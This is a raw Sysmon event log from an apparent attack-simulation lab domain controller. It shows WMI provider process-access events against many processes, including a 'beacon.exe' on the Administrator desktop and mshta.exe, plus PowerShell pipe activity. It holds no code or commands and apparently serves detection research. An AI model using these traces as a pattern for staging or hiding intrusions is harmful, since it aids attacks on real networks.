16:54:43.154{05ADC7E1-6DD2-603E-D2AA-00000000AD01}13920ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242796Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242795Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242794Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242793Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242792Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242791Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242790Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242789Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242788Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.154{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CF9A9ECF6D029EB18FF6AD7FBE462B3,SHA256=080F3AE6D39C18BACCF17125B19BB90FDD4FCD72DE01922050825C4BC8E85482,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242787Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.154{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242786Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242785Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242784Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242783Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002242782Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:54:43.139{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156\PSHost.132591776830125035.10156.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002242781Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242780Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242779Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242778Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242777Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242776Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.139{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242775Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 